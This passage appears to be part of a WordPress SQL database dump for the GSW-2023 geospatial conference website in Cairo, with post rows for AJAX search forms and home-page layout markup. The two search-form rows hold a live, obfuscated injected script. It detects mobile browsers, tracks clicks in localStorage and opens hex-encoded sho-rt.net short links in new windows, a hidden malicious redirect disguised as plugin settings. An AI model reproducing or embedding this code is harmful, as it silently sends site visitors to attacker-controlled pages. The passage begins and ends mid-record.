_0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','AJAX Search Form','','publish','closed','closed','','ajax-search-form','','','2022-11-11 21:49:56','2022-11-11 21:49:56','',0,'https://gsw2023.com/?p=3311',0,'is_search_form','',0),
(3312,1,'2022-11-11 21:49:56','2022-11-11 21:49:56','product\n1\n1\n1\npublish\ninherit\n\ndate\nDESC\n1\n1\nexcerpt\n20\n1\n1\n400\nNothing found\n1\nMore Results..\nboth\n1\n1\n1\nall\ndate\ndesc\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','AJAX Search Form for WooCommerce','','publish','closed','closed','','ajax-search-form-for-woocommerce','','','2022-11-11 21:49:56','2022-11-11 21:49:56','',0,'https://gsw2023.com/?p=3312',0,'is_search_form','',0),
(3313,1,'2022-11-11 22:12:09','2022-11-11 22:12:09','<p>[vc_row css=\".vc_custom_1668005747937{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/2\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text]</p>\n<h2 style=\"color: #311b92; text-align: left;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>[rev_slider alias=\"gsw2023-1\" slidertitle=\"gsw23\"][/rev_slider]</p>\n<h3></h3>\n<p>[/vc_column_text][/vc_column][vc_column width=\"1/2\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"right\" css=\".vc_custom_1668010492701{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668024005657{margin-top: 25px !important;}\" tick_size=\"desktop:50px;\"][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner][vc_column_text]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo City stars Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\n<p>[/vc_column_text][/vc_column_inner][/vc_row_inner][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fwelcome%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1668029705082{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" border_width=\"10\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_column_text css=\".vc_custom_1668021106220{border-top-width: 25px !important;padding-top: 25px !important;}\"]</p>\n<h3 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: justify; color: #311b92;\"><strong>IMPORTANT DATES</strong></h3>\n<p>[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper submission (Annals): March 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract submission (Archives): April 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract submission (Archives): April 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper Author notification: May 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"5\"][vc_row_inner css=\".vc_custom_1668021047643{margin-top: 25px !important;}\"][vc_column_inner css=\".vc_custom_1668021165897{padding-top: 40px !important;}\"][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fimportant-dates%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1668192997249{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]ALL IMPORTANT DATES[/dt_default_button][dt_default_button size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1668020734563{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]SUBMIT YOUR PAPAER:SOON[/dt_default_button][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3162\" img_size=\"1149x800\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^3189|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1668018620108{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION FEES\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]Opening of registration platform: soon[/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fcontact%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: 